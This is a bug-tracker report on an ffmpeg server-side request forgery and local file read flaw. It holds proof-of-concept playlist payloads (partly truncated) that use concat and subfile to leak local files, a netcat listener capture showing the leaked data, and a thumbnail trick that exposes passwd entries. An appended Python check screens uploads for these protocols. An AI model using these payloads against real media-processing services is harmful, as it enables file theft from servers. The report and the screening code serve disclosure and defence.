ffmpeg allows Server-Side Request Forgery attack
Affects | Status | Importance | Assigned to | Milestone
---|---|---|---|---
ffmpeg (Ubuntu) | Fix Released | Medium | Unassigned |
Vivid | Fix Released | Medium | Unassigned |
Wily | Fix Released | Medium | Unassigned |
Xenial | Fix Released | Medium | Unassigned |
Bug Description
There is a Russian blog post about SSRF and local file read with ffmpeg:
http://
One of the variants:
$ cat /tmp/test.m3u8
#EXTM3U
#EXT-X-
#EXTINF:,
http://
(Last line - http://
$ cat /tmp/test.avi
#EXTM3U
#EXT-X-
#EXTINF:10.0,
concat:
#EXT-X-ENDLIST
$ cat /tmp/test
qwerty
123456
Open test.avi with smplayer or even kde baloo:
$ nc -v -l 8080
Listening on [0.0.0.0] (family 0, port 8080)
Connection from [127.0.0.1] port 8080 [tcp/http-alt] accepted (family 2, sport 47636)
GET ?qwerty HTTP/1.1
User-Agent: Lavf/56.1.0
Accept: */*
Range: bytes=0-
Connection: close
Host: localhost:8080
Icy-MetaData: 1
Localhost and local test.m3u8 can be changed to remote server.
File extension does not matter.
There is another attack with thumbnails:
$ cat header.y4m
YUV4MPEG2 W30 H30 F25:1 Ip A0:0 Cmono
FRAME
$ cat video.mp4
#EXTM3U
#EXT-X-
#EXTINF:10.0,
concat:http://
#EXT-X-ENDLIST
$ ffmpeg -i video.mp4 thumbnail.png
$ ffmpeg -i thumbnail.png out.y4m
$ cat out.y4m
YUV4MPEG2 W30 H30 F25:1 Ip A0:0 Cmono
FRAME
# $FreeBSD: release/
,! 2013-10-12 06:08:18Z rpaulo $
#
root:*:0:0:Charlie &:/root:
toor:*:
Changed in ffmpeg (Ubuntu):
importance: Undecided → Medium
Changed in ffmpeg (Ubuntu Vivid):
status: New → Confirmed
Changed in ffmpeg (Ubuntu Wily):
status: New → Confirmed
Changed in ffmpeg (Ubuntu Vivid):
importance: Undecided → Medium
Changed in ffmpeg (Ubuntu Wily):
importance: Undecided → Medium
To read the full file, just switch from 'concat' to 'subfile', as I understood.
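A defensive pre-screening check for the files described in the bug description and the comment above, as an added example that is not part of the original report or of ffmpeg: it treats an upload as a playlist by content rather than by name, then lists every protocol its entries name, unwrapping `concat` and `subfile`. The function names, the empty default allowlist and the sample input are assumptions made for illustration.

```python
import re

PLAYLIST_MAGIC = b"#EXTM3U"
# Protocol prefix as written in the page's payloads: "concat:", "http://",
# or with comma-separated options before the colon ("subfile,,start,0,...:").
PROTO_RE = re.compile(r"^([A-Za-z][A-Za-z0-9+.-]*)(?:,[^:]*)?:")
URI_ATTR_RE = re.compile(r'URI="([^"]*)"')  # URIs carried inside playlist tags


def entry_protocols(uri):
    """Return the protocol names one playlist entry uses, outermost first."""
    m = PROTO_RE.match(uri)
    if not m:
        return []  # plain path, no protocol prefix
    proto = m.group(1).lower()
    found = [proto]
    rest = uri[m.end():]
    if proto == "concat":      # '|'-separated inputs, each may name a protocol
        for part in rest.split("|"):
            found.extend(entry_protocols(part))
    elif proto == "subfile":   # wraps exactly one inner resource
        found.extend(entry_protocols(rest))
    return found


def screen_upload(data, allowed=frozenset()):
    """Return findings for an uploaded file; an empty list means not flagged."""
    text = data.lstrip(b"\xef\xbb\xbf \t\r\n")
    if not text.startswith(PLAYLIST_MAGIC):
        return []  # not a playlist by content
    # Checked by content, not by name: the report notes the extension is ignored.
    findings = ["content is a playlist, whatever the file is named"]
    for n, line in enumerate(text.decode("utf-8", "replace").splitlines(), 1):
        line = line.strip()
        if not line:
            continue
        uris = URI_ATTR_RE.findall(line) if line.startswith("#") else [line]
        for uri in uris:
            for proto in entry_protocols(uri):
                if proto not in allowed:
                    findings.append(f"line {n}: protocol '{proto}' not allowed")
    return findings


# Constructed sample with placeholder targets, not a payload from the page.
SAMPLE = (b"#EXTM3U\n#EXTINF:10.0,\n"
          b"concat:http://media.example.invalid/a|subfile,,start,0,end,16,,:b.bin\n"
          b"#EXT-X-ENDLIST\n")

if __name__ == "__main__":
    for finding in screen_upload(SAMPLE):
        print(finding)
```

A service that only expects real video or image uploads can reject any file for which `screen_upload` returns a non-empty list before it reaches ffmpeg, a thumbnailer or an indexer.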